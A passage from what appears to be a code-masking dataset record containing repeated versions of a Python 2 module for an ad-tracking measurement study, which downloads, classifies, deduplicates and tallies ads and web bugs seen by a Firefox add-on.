\n\n Returns data structure containing request/resp info\n Returns None if did not receive results from FF addon\n \"\"\"\n from Queue import Empty\n try:\n LOG.debug('Timeout value in filter_result :%d' % timeout_value)\n nodes = extQueue.get(True, timeout=timeout_value)\n except Empty as e:\n LOG.info('Did not receive any results from FF plugin for %s' % url)\n nodes = None\n finally:\n while not extQueue.empty():\n extQueue.get()\n return nodes\n\n\ndef process_results(refresh_count, output_dir, ext_queue, result_queue,\n num_of_workers=8):\n \"\"\"\n This function goes through all the bugs identified by the firefox plugin and\n aggregates each bug's occurence in a given page. The aggregation is necessary\n for duplicate ads on the same page\n \"\"\"\n workers_dict = {}\n input_queue = Queue()\n worker_output_queue = Queue()\n ack_queue = Queue()\n bug_dict = {}\n try:\n os.makedirs(output_dir)\n os.makedirs(os.path.join(output_dir, 'notad'))\n except OSError:\n pass\n for i in range(num_of_workers):\n p = Process(target=curl_worker, args=(output_dir, input_queue,\n worker_output_queue, i, ack_queue))\n p.start()\n workers_dict[i] = p\n dl_counter = 0\n while True:\n try:\n found_bugs = json.loads(ext_queue.get(block=True, timeout=2))\n except Exception:\n LOG.debug('No more bugs found, break out of queue')\n break\n for entry in found_bugs:\n bug = parse_buginfo(entry)\n try:\n bug_dict[bug] += 1\n continue\n except KeyError:\n bug_dict[bug] = 1\n try:\n saved_location = 'Visit%d_%s%d' % (refresh_count, bug.\n get_name(), dl_counter)\n dl_counter += 1\n save_to_path = os.path.join(output_dir, '%s' % saved_location)\n input_queue.put((saved_location, save_to_path, bug))\n except Exception as e:\n LOG.exception('%s' % e)\n for i in range(num_of_workers):\n input_queue.put(('STOP',))\n stopped = 0\n while stopped < len(workers_dict):\n ack = ack_queue.get()\n p = workers_dict[ack]\n p.join(timeout=1)\n if p.is_alive():\n p.terminate()\n LOG.debug('terminating process %d' % ack)\n stopped += 1\n while not worker_output_queue.empty():\n cbug = worker_output_queue.get()\n bugcount = bug_dict[cbug]\n del bug_dict[cbug]\n bug_dict[cbug] = bugcount\n with open(os.path.join(output_dir, 'bug_dict%d.pkl' % refresh_count), 'w'\n ) as fwtr:\n cPickle.dump(bug_dict, fwtr)\n result_queue.put(bug_dict)\n return\n", "step-2": "<mask token>\n\n\ndef check_duplicate(fp1, fp2):\n \"\"\"takes two files, does a diff on them, returns True if same\"\"\"\n try:\n subprocess.check_output(['diff', fp1, fp2])\n return True\n except subprocess.CalledProcessError:\n return False\n\n\ndef identify_uniq_ads(session_results):\n \"\"\"\n i) Identify duplicate ads\n ii) bin the ads by their dimensions\n iii) Keep track of the test sites and have many times they have displayed this\n ad\n \"\"\"\n ads = {}\n notads = {}\n swf_bin = {}\n img_bin = {}\n error_bugs = []\n for train_category, cat_dict in session_results.items():\n for test_site, bug_dict_list in cat_dict.items():\n for index_count in range(len(bug_dict_list)):\n bug_dict = bug_dict_list[index_count]\n for bug, bug_count in bug_dict.items():\n bug_filetype = bug.get_filetype()\n bug_filepath = bug.get_filepath()\n if bug_filepath == '':\n error_bugs.append(bug)\n continue\n if bug.is_ad():\n height = '999'\n width = '999'\n if bug_filetype == 'swf':\n target_bin = swf_bin\n try:\n width = subprocess.check_output(['swfdump',\n '-X', bug_filepath]).split(' ')[-1].strip()\n height = subprocess.check_output(['swfdump',\n '-Y', bug_filepath]).split(' 
')[-1].strip()\n except subprocess.CalledProcessError:\n LOG.exception('swfdump error on file %s' %\n bug_filepath)\n else:\n target_bin = img_bin\n LOG.debug(bug_filepath)\n try:\n height = subprocess.check_output([\n 'identify', '-format', '\"%h\"',\n bug_filepath]).strip()\n width = subprocess.check_output(['identify',\n '-format', '\"%w\"', bug_filepath]).strip()\n except subprocess.CalledProcessError:\n LOG.exception('identify error on file %s' %\n bug_filepath)\n try:\n bug.set_dimension(height, width)\n dimension = '%s-%s' % (height, width)\n m_list = target_bin[dimension]\n dup = None\n for m in m_list:\n if check_duplicate(bug_filepath, m.\n get_filepath()):\n dup = m\n break\n if dup:\n if test_site in ads[dup]:\n ads[dup][test_site] += bug_count\n else:\n ads[dup] = {test_site: bug_count}\n del bug_dict[bug]\n bug_dict[dup] = bug_count\n else:\n target_bin[dimension].append(bug)\n ads[bug] = {test_site: bug_count}\n except KeyError:\n target_bin[dimension] = [bug]\n ads[bug] = {test_site: bug_count}\n return ads, error_bugs\n\n\ndef export_uniq_ads(ads, out_folder, rel_folder):\n \"\"\"\n Takes all the uniq ads seen in this session and writes its metadata\n information to a csv file\n \"\"\"\n try:\n os.makedirs(out_folder)\n os.makedirs(os.path.join(out_folder, rel_folder))\n except OSError:\n LOG.debug('Creating output folder')\n fwtr = open(os.path.join(out_folder, 'uniq_ads.csv'), 'w')\n fwtr.write(\n '#UID, Ad-Company, Ad-Filetype, Height, Width, Rel-Location, src\\n')\n for bug in ads.keys():\n height, width = bug.get_dimension()\n filepath = bug.get_filepath()\n name = bug.get_name()\n src = bug.get_src()\n filetype = bug.get_filetype()\n new_uuidname = '%s.%s' % (uuid1(), filetype)\n bug.set_uuid(new_uuidname)\n new_filepath = os.path.join(out_folder, new_uuidname)\n rel_filepath = os.path.join(rel_folder, new_uuidname)\n copy2(filepath, new_filepath)\n fwtr.write('{0}, {1}, {2}, {3}, {4}, {5}, {6}\\n'.format(\n new_uuidname, name, filetype, height, width, rel_filepath, src))\n fwtr.close()\n return ads\n\n\ndef write_run_info(RUNINFO_DIR, session_date):\n fp = os.path.join(RUNINFO_DIR, '%s.info' % session_date)\n with open(fp, 'w') as fwtr:\n fwtr.write('OK')\n\n\n<mask token>\n\n\ndef generate_stats(results, ads, vmid, session_date, export_folder,\n process_ex_time):\n \"\"\"\n Generates stats on\n - uniq ads seen on the test sites\n - total number of ads seen on the test sites\n - total number of ads seen on all test sites\n - total number of uniq ads seen on all test sites\n \"\"\"\n try:\n os.makedirs(export_folder)\n except OSError:\n pass\n totalads = 0\n totaluniqads = len(ads)\n totalad_category = {}\n uniqad_category = {}\n with open(os.path.join(export_folder, 'session_bugs.csv'), 'w'\n ) as bugs_wtr:\n bugs_wtr.write(\n \"\"\"#Ad-UID, Website-URL, Refresh-Num, Training-Topic, Site-Context, BugCount, BugSrc\n\"\"\"\n )\n for train_category, cat_dict in results.items():\n totalad_category[train_category] = {}\n uniqad_category[train_category] = {}\n for test_site, bug_dict_list in cat_dict.items():\n total_ads = 0\n uniq_ads = []\n for refresh_num in range(len(bug_dict_list)):\n bug_dict = bug_dict_list[refresh_num]\n for bug, bugcount in bug_dict.items():\n if bug.is_ad():\n uuid = bug.get_uuid()\n bugs_wtr.write(\n '{0}, {1}, {2}, {3}, {4}, {5}, {6}\\n'.\n format(uuid, test_site, refresh_num,\n train_category, 'N/A', bugcount, bug.get_src())\n )\n total_ads += bugcount\n if bug not in uniq_ads:\n uniq_ads.append(bug)\n 
totalad_category[train_category][test_site] = total_ads\n uniqad_category[train_category][test_site] = len(uniq_ads)\n totalads += total_ads\n with open(os.path.join(export_folder, 'session_stats.csv'), 'w'\n ) as ses_wtr:\n ses_wtr.write('#VMID: %s\\n' % vmid)\n ses_wtr.write('#Session-Date: %s\\n' % session_date)\n ses_wtr.write('#Time to complete: %s\\n' % process_ex_time)\n ses_wtr.write('#Training Categories: %s\\n' % str(results.keys()))\n ses_wtr.write('#Total Number of ads: %d\\n' % totalads)\n ses_wtr.write('#Total Uniq ads: %d\\n\\n' % totaluniqads)\n ses_wtr.write(\n '#TrainingTopic, Test-Site, NumberOfVisit, TotalAds, UniqAds\\n')\n for train_category, cat_dict in results.items():\n for test_site, bug_dict_list in cat_dict.items():\n num_of_visit = len(bug_dict_list)\n ses_wtr.write('{0}, {1}, {2}, {3}, {4}\\n'.format(\n train_category, test_site, num_of_visit,\n totalad_category[train_category][test_site],\n uniqad_category[train_category][test_site]))\n\n\ndef export_ads(results, out_folder):\n \"\"\"\n This function creates a csv file which contains all the unique ads seen in\n each test site (including all the refreshes)\n\n TODO update the doc\n results is a dictionary of the following\n results = { Category : Value, ... }\n value = { test_site_url : [ result1, result2, ... resultN], ... }\n resultN : { WebBug : count, ... }\n \"\"\"\n try:\n os.makedirs(out_folder)\n except OSError:\n LOG.debug('Creating output file folder ...')\n export_ad_counter = 1\n with open(os.path.join(out_folder, 'ad_labelling.csv'), 'w') as fwtr:\n fwtr.write('#{0}, {1}, {2}, {3}, {4}, {5}, {6}, {7}, {8}, {9}\\n'.\n format('Ad#', 'Company', 'FileType', 'Ad-Category',\n 'Website-URL', 'Refresh-Num', 'Training-Topic',\n 'Context-of-site', 'Total', 'Ad-src'))\n for train_category, cat_dict in results.items():\n for test_site, bug_dict_list in cat_dict.items():\n for refresh_num in range(len(bug_dict_list)):\n bug_dict = bug_dict_list[refresh_num]\n for bug, bugcount in bug_dict.items():\n if not bug.is_ad():\n continue\n if bug.get_filetype() in ['swf', 'png', 'gif', 'jpg']:\n file_name = '%d.%s' % (export_ad_counter, bug.\n get_filetype())\n new_location = os.path.join(out_folder, file_name)\n copy2(bug.get_filepath(), new_location)\n fwtr.write(\n \"\"\"{0}, {1}, {2}, {3}, {4}, {5}, {6}, {7} , {8}, {9}, \n\"\"\"\n .format(file_name, bug.get_name(), bug.\n get_filetype(), '', test_site, refresh_num,\n train_category, 'N/A', bugcount, bug.get_src())\n )\n export_ad_counter += 1\n\n\ndef get_bug_type(file_type):\n is_ad = False\n bug_type = 'text'\n if file_type.startswith('HTML') or file_type.startswith('ASCII'\n ) or file_type.startswith('UTF-8 Unicode English'\n ) or file_type.startswith('very short'):\n bug_type = 'text'\n elif file_type.endswith('1 x 1') and file_type.startswith('GIF'):\n bug_type = 'gif'\n elif file_type.startswith('PNG'):\n bug_type = 'png'\n is_ad = True\n elif file_type.startswith('GIF'):\n bug_type = 'gif'\n is_ad = True\n elif file_type.startswith('Macromedia Flash'):\n bug_type = 'swf'\n is_ad = True\n elif file_type.startswith('JPEG'):\n bug_type = 'jpg'\n is_ad = True\n return bug_type, is_ad\n\n\ndef parse_buginfo(entry):\n \"\"\"\n Takes the json decoded bug information and inserts it into a WebBug instance\n \"\"\"\n bugname = entry['bug']['name'].replace(' ', '').replace('/', '_')\n bugsrc = entry['ent']['policyContentLocation']\n bugpattern = entry['bug']['pattern']\n try:\n bugaffiliation = entry['bug']['affiliation']\n except KeyError:\n bugaffiliation = ''\n 
bugtype = entry['bug']['type']\n bugpathname = entry['ent']['pathname']\n return WebBug(name=bugname, src=bugsrc, affiliation=bugaffiliation,\n bug_type=bugtype, matched_pattern=bugpattern, pathname=bugpathname)\n\n\ndef curl_worker_legacy(args):\n output_dir = args[0]\n saved_file_name = args[1]\n path = args[2]\n bug = args[3]\n curl_result_queue = args[4]\n subprocess.call(['wget', '-t', '1', '-q', '-T', '3', '-O', path, bug.\n get_src()])\n subpr_out = subprocess.check_output(['file', '-b', path]).strip()\n filetype, is_ad = get_bug_type(subpr_out)\n if is_ad:\n new_path = os.path.join(output_dir, '%s.%s' % (saved_file_name,\n filetype))\n else:\n new_path = os.path.join(output_dir, 'notad', '%s.%s' % (\n saved_file_name, filetype))\n os.rename(path, new_path)\n bug.set_is_ad(is_ad)\n bug.set_filetype(filetype)\n bug.set_filepath(new_path)\n curl_result_queue.put(bug)\n\n\ndef process_results_legacy(refresh_count, output_dir, ext_queue,\n result_queue, num_of_workers=8):\n \"\"\"\n This function goes through all the bugs identified by the firefox plugin and\n aggregates each bug's occurence in a given page. The aggregation is necessary\n for duplicate ads on the same page\n \"\"\"\n bug_dict = {}\n try:\n os.makedirs(output_dir)\n os.makedirs(os.path.join(output_dir, 'notad'))\n except OSError:\n pass\n curl_worker_pool = Pool(processes=num_of_workers)\n manager = Manager()\n curl_result_queue = manager.Queue()\n dl_counter = 0\n while True:\n try:\n found_bugs = json.loads(ext_queue.get(block=True, timeout=2))\n except Exception:\n LOG.debug('Timing out on get from queue...')\n break\n for entry in found_bugs:\n bugname = entry['bug']['name'].replace(' ', '').replace('/', '_')\n bugsrc = entry['ent']['policyContentLocation']\n bugpattern = entry['bug']['pattern']\n try:\n bugaffiliation = entry['bug']['affiliation']\n except KeyError:\n bugaffiliation = ''\n bugtype = entry['bug']['type']\n bugpathname = entry['ent']['pathname']\n bug = WebBug(name=bugname, src=bugsrc, affiliation=\n bugaffiliation, bug_type=bugtype, matched_pattern=\n bugpattern, pathname=bugpathname)\n try:\n bug_dict[bug] += 1\n continue\n except KeyError:\n bug_dict[bug] = 1\n saved_location = 'Visit%d_%s%d' % (refresh_count, bugname,\n dl_counter)\n dl_counter += 1\n save_to_path = os.path.join(output_dir, '%s' % saved_location)\n obj = curl_worker_pool.apply_async(curl_worker_legacy, ((\n output_dir, saved_location, save_to_path, bug,\n curl_result_queue),))\n try:\n sleep(0.5)\n curl_worker_pool.join()\n curl_worker_pool.close()\n curl_worker_pool.terminate()\n except Exception:\n LOG.debug('Closing pool')\n while not curl_result_queue.empty():\n cbug = curl_result_queue.get()\n bugcount = bug_dict[cbug]\n del bug_dict[cbug]\n bug_dict[cbug] = bugcount\n with open(os.path.join(output_dir, 'bug_dict%d.pkl' % refresh_count), 'w'\n ) as fwtr:\n cPickle.dump(bug_dict, fwtr)\n result_queue.put(bug_dict)\n\n\ndef curl_worker(output_dir, input_queue, worker_output_queue, worker_id,\n ack_queue):\n while True:\n try:\n task = input_queue.get()\n if len(task) == 1 and task[0] == 'STOP':\n LOG.debug('curl_worker %d received stop' % worker_id)\n break\n except Exception:\n LOG.error('Error:')\n saved_file_name = task[0]\n path = task[1]\n bug = task[2]\n try:\n subprocess.call(['wget', '-t', '1', '-q', '-T', '3', '-O', path,\n bug.get_src()])\n subpr_out = subprocess.check_output(['file', '-b', path]).strip()\n except Exception as e:\n LOG.debug('Exception captured %s\\n\\n' % e)\n filetype, is_ad = 
get_bug_type(subpr_out)\n if is_ad:\n new_path = os.path.join(output_dir, '%s.%s' % (saved_file_name,\n filetype))\n else:\n new_path = os.path.join(output_dir, 'notad', '%s.%s' % (\n saved_file_name, filetype))\n os.rename(path, new_path)\n bug.set_is_ad(is_ad)\n bug.set_filetype(filetype)\n bug.set_filepath(new_path)\n worker_output_queue.put(bug)\n ack_queue.put(worker_id)\n return\n\n\ndef build_nodes(jsonData):\n \"\"\"\n This function takes a JSON encoded output of the firefox addon and builds a\n call graph for the javascript/HTML redirections\n\n @rtype nodes: dict\n @return: A graph of redirection chains\n \"\"\"\n nodes = {}\n\n def _process_cookiestr(cookieStr):\n \"\"\"\n parses a dictionary of req/resp calls to extract the cookie information\n returns a list of cookies set on this domain\n \"\"\"\n cookie_list = []\n for cookie in cookieStr.split('\\n'):\n c = {}\n for cook in cookie.split(';'):\n token = cook.split('=', 1)\n if len(token) < 2:\n continue\n c[token[0]] = token[1]\n cookie_list.append(c)\n return cookie_list\n\n def _check_node(d):\n try:\n domain_node = nodes[d]\n except KeyError:\n isBug, bug_name, bug_type = ADREGEX.search(domain)\n domain_node = WebNode(domain, isBug, bug_name, bug_type)\n nodes[d] = domain_node\n return domain_node\n for domain, dval in jsonData.items():\n domain_node = _check_node(domain)\n cookie_list = []\n for info in dval:\n domainPath = info['domainPath']\n referrerPath = info['referrerPath']\n referrer = info['referrer']\n cookieBool = info['cookie']\n parsed_cookie = None\n if cookieBool:\n cookieStr = info['cookiestr']\n parsed_cookie = _process_cookiestr(cookieStr)\n cookie_list.append(parsed_cookie)\n domain_node.add_reqresp({'domainPath': domainPath, 'referrer':\n referrer, 'referrerPath': referrerPath, 'cookieList':\n parsed_cookie})\n referrer_node = _check_node(referrer)\n referrer_node.add_child(domain_node)\n domain_node.add_parent(referrer_node)\n domain_node.set_cookies(cookie_list)\n return nodes\n\n\ndef filter_results(extQueue, timeout_value, url):\n \"\"\"\n This function takes the JSON output of the firefox addon, and matches the\n request URL against a list of known tracker/ads regexes. \n\n Returns data structure containing request/resp info\n Returns None if did not receive results from FF addon\n \"\"\"\n from Queue import Empty\n try:\n LOG.debug('Timeout value in filter_result :%d' % timeout_value)\n nodes = extQueue.get(True, timeout=timeout_value)\n except Empty as e:\n LOG.info('Did not receive any results from FF plugin for %s' % url)\n nodes = None\n finally:\n while not extQueue.empty():\n extQueue.get()\n return nodes\n\n\ndef process_results(refresh_count, output_dir, ext_queue, result_queue,\n num_of_workers=8):\n \"\"\"\n This function goes through all the bugs identified by the firefox plugin and\n aggregates each bug's occurence in a given page. 
The aggregation is necessary\n for duplicate ads on the same page\n \"\"\"\n workers_dict = {}\n input_queue = Queue()\n worker_output_queue = Queue()\n ack_queue = Queue()\n bug_dict = {}\n try:\n os.makedirs(output_dir)\n os.makedirs(os.path.join(output_dir, 'notad'))\n except OSError:\n pass\n for i in range(num_of_workers):\n p = Process(target=curl_worker, args=(output_dir, input_queue,\n worker_output_queue, i, ack_queue))\n p.start()\n workers_dict[i] = p\n dl_counter = 0\n while True:\n try:\n found_bugs = json.loads(ext_queue.get(block=True, timeout=2))\n except Exception:\n LOG.debug('No more bugs found, break out of queue')\n break\n for entry in found_bugs:\n bug = parse_buginfo(entry)\n try:\n bug_dict[bug] += 1\n continue\n except KeyError:\n bug_dict[bug] = 1\n try:\n saved_location = 'Visit%d_%s%d' % (refresh_count, bug.\n get_name(), dl_counter)\n dl_counter += 1\n save_to_path = os.path.join(output_dir, '%s' % saved_location)\n input_queue.put((saved_location, save_to_path, bug))\n except Exception as e:\n LOG.exception('%s' % e)\n for i in range(num_of_workers):\n input_queue.put(('STOP',))\n stopped = 0\n while stopped < len(workers_dict):\n ack = ack_queue.get()\n p = workers_dict[ack]\n p.join(timeout=1)\n if p.is_alive():\n p.terminate()\n LOG.debug('terminating process %d' % ack)\n stopped += 1\n while not worker_output_queue.empty():\n cbug = worker_output_queue.get()\n bugcount = bug_dict[cbug]\n del bug_dict[cbug]\n bug_dict[cbug] = bugcount\n with open(os.path.join(output_dir, 'bug_dict%d.pkl' % refresh_count), 'w'\n ) as fwtr:\n cPickle.dump(bug_dict, fwtr)\n result_queue.put(bug_dict)\n return\n", "step-3": "<mask token>\n\n\ndef check_duplicate(fp1, fp2):\n \"\"\"takes two files, does a diff on them, returns True if same\"\"\"\n try:\n subprocess.check_output(['diff', fp1, fp2])\n return True\n except subprocess.CalledProcessError:\n return False\n\n\ndef identify_uniq_ads(session_results):\n \"\"\"\n i) Identify duplicate ads\n ii) bin the ads by their dimensions\n iii) Keep track of the test sites and have many times they have displayed this\n ad\n \"\"\"\n ads = {}\n notads = {}\n swf_bin = {}\n img_bin = {}\n error_bugs = []\n for train_category, cat_dict in session_results.items():\n for test_site, bug_dict_list in cat_dict.items():\n for index_count in range(len(bug_dict_list)):\n bug_dict = bug_dict_list[index_count]\n for bug, bug_count in bug_dict.items():\n bug_filetype = bug.get_filetype()\n bug_filepath = bug.get_filepath()\n if bug_filepath == '':\n error_bugs.append(bug)\n continue\n if bug.is_ad():\n height = '999'\n width = '999'\n if bug_filetype == 'swf':\n target_bin = swf_bin\n try:\n width = subprocess.check_output(['swfdump',\n '-X', bug_filepath]).split(' ')[-1].strip()\n height = subprocess.check_output(['swfdump',\n '-Y', bug_filepath]).split(' ')[-1].strip()\n except subprocess.CalledProcessError:\n LOG.exception('swfdump error on file %s' %\n bug_filepath)\n else:\n target_bin = img_bin\n LOG.debug(bug_filepath)\n try:\n height = subprocess.check_output([\n 'identify', '-format', '\"%h\"',\n bug_filepath]).strip()\n width = subprocess.check_output(['identify',\n '-format', '\"%w\"', bug_filepath]).strip()\n except subprocess.CalledProcessError:\n LOG.exception('identify error on file %s' %\n bug_filepath)\n try:\n bug.set_dimension(height, width)\n dimension = '%s-%s' % (height, width)\n m_list = target_bin[dimension]\n dup = None\n for m in m_list:\n if check_duplicate(bug_filepath, m.\n get_filepath()):\n dup = m\n break\n if 
dup:\n if test_site in ads[dup]:\n ads[dup][test_site] += bug_count\n else:\n ads[dup] = {test_site: bug_count}\n del bug_dict[bug]\n bug_dict[dup] = bug_count\n else:\n target_bin[dimension].append(bug)\n ads[bug] = {test_site: bug_count}\n except KeyError:\n target_bin[dimension] = [bug]\n ads[bug] = {test_site: bug_count}\n return ads, error_bugs\n\n\ndef export_uniq_ads(ads, out_folder, rel_folder):\n \"\"\"\n Takes all the uniq ads seen in this session and writes its metadata\n information to a csv file\n \"\"\"\n try:\n os.makedirs(out_folder)\n os.makedirs(os.path.join(out_folder, rel_folder))\n except OSError:\n LOG.debug('Creating output folder')\n fwtr = open(os.path.join(out_folder, 'uniq_ads.csv'), 'w')\n fwtr.write(\n '#UID, Ad-Company, Ad-Filetype, Height, Width, Rel-Location, src\\n')\n for bug in ads.keys():\n height, width = bug.get_dimension()\n filepath = bug.get_filepath()\n name = bug.get_name()\n src = bug.get_src()\n filetype = bug.get_filetype()\n new_uuidname = '%s.%s' % (uuid1(), filetype)\n bug.set_uuid(new_uuidname)\n new_filepath = os.path.join(out_folder, new_uuidname)\n rel_filepath = os.path.join(rel_folder, new_uuidname)\n copy2(filepath, new_filepath)\n fwtr.write('{0}, {1}, {2}, {3}, {4}, {5}, {6}\\n'.format(\n new_uuidname, name, filetype, height, width, rel_filepath, src))\n fwtr.close()\n return ads\n\n\ndef write_run_info(RUNINFO_DIR, session_date):\n fp = os.path.join(RUNINFO_DIR, '%s.info' % session_date)\n with open(fp, 'w') as fwtr:\n fwtr.write('OK')\n\n\ndef write_session_info(vmid, machineid, profile, session_date, train_mode,\n training_sites, test_sites, num_of_refresh, export_folder):\n train_category = training_sites.keys()[0]\n train_sites_to_visit = training_sites[train_category]\n with open(os.path.join(export_folder, 'session_info.csv'), 'w') as fwtr:\n fwtr.write('session_str : %s\\n' % session_date)\n fwtr.write('machine_info : %s\\n' % machineid)\n fwtr.write('vmid : %s\\n' % vmid)\n fwtr.write('profile : %s\\n' % profile)\n fwtr.write('train_mode : %s\\n' % train_mode)\n fwtr.write('num_of_refresh : %d\\n' % num_of_refresh)\n fwtr.write('training_topic : %s\\n' % train_category)\n fwtr.write('training_sites : ')\n for site in train_sites_to_visit:\n fwtr.write('%s, ' % site)\n fwtr.write('\\nnum_of_train_sites : %d\\n' % len(train_sites_to_visit))\n fwtr.write('test_sites : ')\n for site in test_sites:\n fwtr.write('%s, ' % site[1])\n fwtr.write('\\nnum_of_test_sites : %d\\n' % len(test_sites))\n\n\ndef generate_stats(results, ads, vmid, session_date, export_folder,\n process_ex_time):\n \"\"\"\n Generates stats on\n - uniq ads seen on the test sites\n - total number of ads seen on the test sites\n - total number of ads seen on all test sites\n - total number of uniq ads seen on all test sites\n \"\"\"\n try:\n os.makedirs(export_folder)\n except OSError:\n pass\n totalads = 0\n totaluniqads = len(ads)\n totalad_category = {}\n uniqad_category = {}\n with open(os.path.join(export_folder, 'session_bugs.csv'), 'w'\n ) as bugs_wtr:\n bugs_wtr.write(\n \"\"\"#Ad-UID, Website-URL, Refresh-Num, Training-Topic, Site-Context, BugCount, BugSrc\n\"\"\"\n )\n for train_category, cat_dict in results.items():\n totalad_category[train_category] = {}\n uniqad_category[train_category] = {}\n for test_site, bug_dict_list in cat_dict.items():\n total_ads = 0\n uniq_ads = []\n for refresh_num in range(len(bug_dict_list)):\n bug_dict = bug_dict_list[refresh_num]\n for bug, bugcount in bug_dict.items():\n if bug.is_ad():\n uuid = bug.get_uuid()\n 
bugs_wtr.write(\n '{0}, {1}, {2}, {3}, {4}, {5}, {6}\\n'.\n format(uuid, test_site, refresh_num,\n train_category, 'N/A', bugcount, bug.get_src())\n )\n total_ads += bugcount\n if bug not in uniq_ads:\n uniq_ads.append(bug)\n totalad_category[train_category][test_site] = total_ads\n uniqad_category[train_category][test_site] = len(uniq_ads)\n totalads += total_ads\n with open(os.path.join(export_folder, 'session_stats.csv'), 'w'\n ) as ses_wtr:\n ses_wtr.write('#VMID: %s\\n' % vmid)\n ses_wtr.write('#Session-Date: %s\\n' % session_date)\n ses_wtr.write('#Time to complete: %s\\n' % process_ex_time)\n ses_wtr.write('#Training Categories: %s\\n' % str(results.keys()))\n ses_wtr.write('#Total Number of ads: %d\\n' % totalads)\n ses_wtr.write('#Total Uniq ads: %d\\n\\n' % totaluniqads)\n ses_wtr.write(\n '#TrainingTopic, Test-Site, NumberOfVisit, TotalAds, UniqAds\\n')\n for train_category, cat_dict in results.items():\n for test_site, bug_dict_list in cat_dict.items():\n num_of_visit = len(bug_dict_list)\n ses_wtr.write('{0}, {1}, {2}, {3}, {4}\\n'.format(\n train_category, test_site, num_of_visit,\n totalad_category[train_category][test_site],\n uniqad_category[train_category][test_site]))\n\n\ndef export_ads(results, out_folder):\n \"\"\"\n This function creates a csv file which contains all the unique ads seen in\n each test site (including all the refreshes)\n\n TODO update the doc\n results is a dictionary of the following\n results = { Category : Value, ... }\n value = { test_site_url : [ result1, result2, ... resultN], ... }\n resultN : { WebBug : count, ... }\n \"\"\"\n try:\n os.makedirs(out_folder)\n except OSError:\n LOG.debug('Creating output file folder ...')\n export_ad_counter = 1\n with open(os.path.join(out_folder, 'ad_labelling.csv'), 'w') as fwtr:\n fwtr.write('#{0}, {1}, {2}, {3}, {4}, {5}, {6}, {7}, {8}, {9}\\n'.\n format('Ad#', 'Company', 'FileType', 'Ad-Category',\n 'Website-URL', 'Refresh-Num', 'Training-Topic',\n 'Context-of-site', 'Total', 'Ad-src'))\n for train_category, cat_dict in results.items():\n for test_site, bug_dict_list in cat_dict.items():\n for refresh_num in range(len(bug_dict_list)):\n bug_dict = bug_dict_list[refresh_num]\n for bug, bugcount in bug_dict.items():\n if not bug.is_ad():\n continue\n if bug.get_filetype() in ['swf', 'png', 'gif', 'jpg']:\n file_name = '%d.%s' % (export_ad_counter, bug.\n get_filetype())\n new_location = os.path.join(out_folder, file_name)\n copy2(bug.get_filepath(), new_location)\n fwtr.write(\n \"\"\"{0}, {1}, {2}, {3}, {4}, {5}, {6}, {7} , {8}, {9}, \n\"\"\"\n .format(file_name, bug.get_name(), bug.\n get_filetype(), '', test_site, refresh_num,\n train_category, 'N/A', bugcount, bug.get_src())\n )\n export_ad_counter += 1\n\n\ndef get_bug_type(file_type):\n is_ad = False\n bug_type = 'text'\n if file_type.startswith('HTML') or file_type.startswith('ASCII'\n ) or file_type.startswith('UTF-8 Unicode English'\n ) or file_type.startswith('very short'):\n bug_type = 'text'\n elif file_type.endswith('1 x 1') and file_type.startswith('GIF'):\n bug_type = 'gif'\n elif file_type.startswith('PNG'):\n bug_type = 'png'\n is_ad = True\n elif file_type.startswith('GIF'):\n bug_type = 'gif'\n is_ad = True\n elif file_type.startswith('Macromedia Flash'):\n bug_type = 'swf'\n is_ad = True\n elif file_type.startswith('JPEG'):\n bug_type = 'jpg'\n is_ad = True\n return bug_type, is_ad\n\n\ndef parse_buginfo(entry):\n \"\"\"\n Takes the json decoded bug information and inserts it into a WebBug instance\n \"\"\"\n bugname = 
entry['bug']['name'].replace(' ', '').replace('/', '_')\n bugsrc = entry['ent']['policyContentLocation']\n bugpattern = entry['bug']['pattern']\n try:\n bugaffiliation = entry['bug']['affiliation']\n except KeyError:\n bugaffiliation = ''\n bugtype = entry['bug']['type']\n bugpathname = entry['ent']['pathname']\n return WebBug(name=bugname, src=bugsrc, affiliation=bugaffiliation,\n bug_type=bugtype, matched_pattern=bugpattern, pathname=bugpathname)\n\n\ndef curl_worker_legacy(args):\n output_dir = args[0]\n saved_file_name = args[1]\n path = args[2]\n bug = args[3]\n curl_result_queue = args[4]\n subprocess.call(['wget', '-t', '1', '-q', '-T', '3', '-O', path, bug.\n get_src()])\n subpr_out = subprocess.check_output(['file', '-b', path]).strip()\n filetype, is_ad = get_bug_type(subpr_out)\n if is_ad:\n new_path = os.path.join(output_dir, '%s.%s' % (saved_file_name,\n filetype))\n else:\n new_path = os.path.join(output_dir, 'notad', '%s.%s' % (\n saved_file_name, filetype))\n os.rename(path, new_path)\n bug.set_is_ad(is_ad)\n bug.set_filetype(filetype)\n bug.set_filepath(new_path)\n curl_result_queue.put(bug)\n\n\ndef process_results_legacy(refresh_count, output_dir, ext_queue,\n result_queue, num_of_workers=8):\n \"\"\"\n This function goes through all the bugs identified by the firefox plugin and\n aggregates each bug's occurence in a given page. The aggregation is necessary\n for duplicate ads on the same page\n \"\"\"\n bug_dict = {}\n try:\n os.makedirs(output_dir)\n os.makedirs(os.path.join(output_dir, 'notad'))\n except OSError:\n pass\n curl_worker_pool = Pool(processes=num_of_workers)\n manager = Manager()\n curl_result_queue = manager.Queue()\n dl_counter = 0\n while True:\n try:\n found_bugs = json.loads(ext_queue.get(block=True, timeout=2))\n except Exception:\n LOG.debug('Timing out on get from queue...')\n break\n for entry in found_bugs:\n bugname = entry['bug']['name'].replace(' ', '').replace('/', '_')\n bugsrc = entry['ent']['policyContentLocation']\n bugpattern = entry['bug']['pattern']\n try:\n bugaffiliation = entry['bug']['affiliation']\n except KeyError:\n bugaffiliation = ''\n bugtype = entry['bug']['type']\n bugpathname = entry['ent']['pathname']\n bug = WebBug(name=bugname, src=bugsrc, affiliation=\n bugaffiliation, bug_type=bugtype, matched_pattern=\n bugpattern, pathname=bugpathname)\n try:\n bug_dict[bug] += 1\n continue\n except KeyError:\n bug_dict[bug] = 1\n saved_location = 'Visit%d_%s%d' % (refresh_count, bugname,\n dl_counter)\n dl_counter += 1\n save_to_path = os.path.join(output_dir, '%s' % saved_location)\n obj = curl_worker_pool.apply_async(curl_worker_legacy, ((\n output_dir, saved_location, save_to_path, bug,\n curl_result_queue),))\n try:\n sleep(0.5)\n curl_worker_pool.join()\n curl_worker_pool.close()\n curl_worker_pool.terminate()\n except Exception:\n LOG.debug('Closing pool')\n while not curl_result_queue.empty():\n cbug = curl_result_queue.get()\n bugcount = bug_dict[cbug]\n del bug_dict[cbug]\n bug_dict[cbug] = bugcount\n with open(os.path.join(output_dir, 'bug_dict%d.pkl' % refresh_count), 'w'\n ) as fwtr:\n cPickle.dump(bug_dict, 